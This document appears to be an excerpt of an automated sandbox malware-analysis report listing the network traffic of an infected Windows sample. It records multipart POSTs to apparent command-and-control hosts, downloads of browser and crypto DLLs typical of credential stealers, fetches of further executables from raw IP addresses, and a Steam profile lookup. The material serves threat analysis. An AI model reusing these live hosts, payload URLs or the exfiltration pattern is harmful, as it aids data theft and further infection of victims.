Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12830Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15072Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20562Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5445Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568201Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGHJECFCFCBFIDBGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5897Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIJEBFCGDAAKFHIDBFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFIDGCBFBAKEBFBKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 112837Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbtdsjawscshri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gitrvlonrfqrq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ltjhtqaytuwkyt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjjvubikquby.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctkjptrcxdnjtm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eisoaquivduh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wbiuottwvhtdjd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eevetcrfdfleqxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unanbdkiibq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hfcngeudnubrryg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgaaagvpavk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvvaotfskdoxlio.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: dbfhns.in
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipxqunnvdoai.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xrjlnlbrgajqsny.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uopupolbajboxnf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imsuruvsrfypw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvpyitsqtsmmqygu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yowyackmlvbjrxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkbknieekjatcp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txclniyqjcys.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmtbjhmhexqkn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsnmddlhyunj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eamimphmsadwkq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anyyjopgfajdv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlfkitushftrjirb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plbuqwbmoldqvnm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tjxcjquxocrwkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmlhlokjcexweyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vjusdpgryce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ajfprnyfteagngdf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: dbfhns.in
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nqimnaeauxblwda.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: dbfhns.in
Source: unknown TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: 13_2_6C9FCC60 PR_Recv, 13_2_6C9FCC60
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: dbfhns.in
Source: global traffic DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
